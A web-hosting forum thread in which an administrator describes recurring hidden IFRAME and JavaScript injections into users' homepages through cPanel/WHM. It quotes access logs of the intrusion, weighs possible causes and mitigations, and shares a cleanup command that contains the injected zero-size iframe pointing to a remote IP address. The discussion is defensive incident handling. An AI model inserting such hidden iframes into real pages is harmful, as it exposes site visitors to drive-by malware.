JavaScript & IFRAME Insert Hacks Through xfercpanel

I have read other threads concerning this stuff and I feel I need a unique thread for my situation. I am getting these BS IFRAME & JAVASCRIPT inserts onto my domains homepages on my server. I had Cpanel 10 and upgraded to Cpanel 11 with CLAMAV and no better

My files are not being accessed through a vulnerable script or through FTP, but rather through WHM itself (File manager to be exact).

This means that either A = "Someone" or B = "Some script or worm" is either 1 = "Hacking my root password and gaining access and using xfercpanel to access user accounts" or 2 = "Finding a hole somewhere in Cpanel to gain access to my WHM etc".

My /usr/local/cpanel/logs/access_log shows evidence of the intrusion:


"""""""""""""""

Code:

76.108.14.98 - root [09/14/2007:08:52:13 -0000] "GET /xfercpanel/bulldog HTTP/1.1" 0 "https://MYSERVERIP:2087/scripts2/listaccts?viewall=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
76.108.14.98 - root [09/14/2007:08:52:13 -0000] "GET /xfercpanel/bulldog HTTP/1." 0 "https://MYSERVERIP:2087/scripts2/listaccts?viewall=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
76.108.14.98 - [09/14/2007:08:52:15 -0000] "GET /login/?session=ZqRBajXbwEIAzkKrtX1TZ8bdboJybQUaSqpaBzfvZ fsXSXHrv_4dO4jq2hDYUx38 HTTP/1.1" 301 0 "https://MYSERVERIP:2087/scripts2/listaccts?viewall=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
76.108.14.98 - bulldog [09/14/2007:08:52:20 -0000] "GET / HTTP/1.1" 301 0 "https://MYSERVERIP:2087/scripts2/listaccts?viewall=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
76.108.14.98 - bulldog [09/14/2007:08:52:28 -0000] "GET /frontend/x3/index.html HTTP/1.1" 200 0 "https://MYSERVERIP:2087/scripts2/listaccts?viewall=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
...(A bunch of css and image files listed here)...
76.108.14.98 - bulldog [09/14/2007:08:54:20 -0000] "GET /frontend/x3/files/img/fileactions/copy.png HTTP/1.1" 200 0 "https://MYSERVERIP:2083/frontend/x3/files/selfile.html?dir=%2fhome%2fbulldog%2fpublic_html%2 fregion2&file=login.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
76.108.14.98 - bulldog [09/14/2007:08:54:22 -0000] "GET /frontend/x3/files/editit.html?dir=%2fhome%2fbulldog%2fpublic_html%2f region2&file=login.php HTTP/1.1" 200 0 "https://MYSERVERIP:2083/frontend/x3/files/selfile.html?dir=%2fhome%2fbulldog%2fpublic_html%2 fregion2&file=login.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
76.108.14.98 - bulldog [09/14/2007:08:54:22 -0000] "GET /frontend/x3/files/images/filemantopbg.jpg HTTP/1.1" 200 0 "https://MYSERVERIP:2083/frontend/x3/files/editit.html?dir=%2fhome%2fbulldog%2fpublic_html%2f region2&file=login.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
76.108.14.98 - bulldog [09/14/2007:08:54:57 -0000] "POST /frontend/x3/files/savefile.html HTTP/1.1" 200 0 "https://MYSERVERIP:2083/frontend/x3/files/editit.html?dir=%2fhome%2fbulldog%2fpublic_html%2f region2&file=login.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
76.108.14.98 - bulldog [09/14/2007:08:56:40 -0000] "GET /frontend/x3/filemanager/index.html?dirselect=webroot&domainselect=bulldog domain.com&dir=%2Fhome%2Fbulldog%2Fpublic_html HTTP/1.1" 200 0 "https://MYSERVERIP:2083/frontend/x3/index.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
76.108.14.98 - bulldog [09/14/2007:08:56:45 -0000] "GET /cPanel_magic_revision_1189191533//frontend/x3/yui/data/data_optimized.js HTTP/1.1" 200 0 "https://MYSERVERIP:2083/frontend/x3/filemanager/index.html?dirselect=webroot&domainselect=bulldog domain.com&dir=%2Fhome%2Fbulldog%2Fpublic_html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
76.108.14.98 - root [09/14/2007:08:57:22 -0000] "GET /xfercpanel/montbarc HTTP/1.1" 0 "https://MYSERVERIP:2087/scripts2/listaccts?viewall=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
76.108.14.98 - root [09/14/2007:08:57:22 -0000] "GET /xfercpanel/montbarc HTTP/1." 0 "https://MYSERVERIP:2087/scripts2/listaccts?viewall=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
76.108.14.98 - [09/14/2007:08:57:23 -0000] "GET /login/?session=BeZr34kPtSssxYbIySRgOK8SN1qQ2czfytgErkTbm qM8mCkzUo2xxgDXgBNq1iKF HTTP/1.1" 301 0 "https://MYSERVERIP:2087/scripts2/listaccts?viewall=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
76.108.14.98 - montbarc [09/14/2007:08:57:28 -0000] "GET / HTTP/1.1" 301 0 "https://MYSERVERIP:2087/scripts2/listaccts?viewall=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
76.108.14.98 - montbarc [09/14/2007:08:57:33 -0000] "GET /frontend/xcontroller2/index.html HTTP/1.1" 200 0 "https://MYSERVERIP:2087/scripts2/listaccts?viewall=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
76.108.14.98 - montbarc [09/14/2007:08:57:40 -0000] "GET /frontend/xcontroller2/styles.css HTTP/1.1" 200 0 "https://MYSERVERIP:2083/frontend/xcontroller2/index.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
...(This keeps looping to just about every domain on my server)...

"""""""""""""""

Discovering more about this problem.
- Blocking the IP address of the intruder is, of course, useless since tomorrow it will happen again from a different IP.
- Cannot use mod_security since it does not apply to cpanel access ports
- Checking "Tweak Settings -> Disable login with root or reseller password ..." works very effectively, but pisses off people who have WHM access. They would not understand why I have to take away an convenient feature in their accoutn to prevent hacking.

Some logic:
I would assume that if the combination of A and 1 are true then someone would have better stuff to do than manually edit users' homepages and then call it a day. Why not make more trouble or do something different? Since this appears to be the only thing bad being done and also due to the methodical nature of the travel through the server as shown by the logs, I am led to assume that A is FALSE and it is being performed by a script of some kind.
That leaves a probable combination of either B+1 or B+2.
*If B+1 is true, I need to get a more secure password policy. I have SSH and Exim hacking protected with APF/BFD, but I think Cpanel/WHM hacking is not protcted in such a way. Maybe there is some kind of securrity I can put on there?
*If B+2 is true, I would like Cpanel to fix the hole.
Which is true? I have no idea, I hevent gotten that far yet. I am open to suggestion.

How to deal with this problem?
Not sure yet other than to mop up the problem when it happens (just about every other day). Here is some script I have been using for damage control:
find /home/a*/public_html/* -regex ".*\(\.php\|\.html\|\.tpl\|\.htm\|\.inc\)$" -type f -exec replace '<IFRAME SRC="http://81.95.148.155/lb/main.php" WIDTH="0" HEIGHT="0"></IFRAME>' '' -- {} \;

So is anyone else experiencing these hacks in this same way? What can be done? Thanks for any help.

 

Thanks for your reply cpdan.

The iframe or javascript is inserted into html -- typically into the index page but can occur in some other default-type document.

The document edited in this example is index.html, although you cannot see that exactly from the log. What the log does show is a malicious user, in this case 76.108.14.98, using xfercpanel to go from root to the user's cpanel, then using editit.html and savefile.html (the cpanel FileManager) to actually edit the target document.

Some good news, I see Cpanel has added the CPHULK to Security Center in WHM. That may help prevent this kind of hacking

 

Correction. Yes, for this account both login.php and index.html were affected.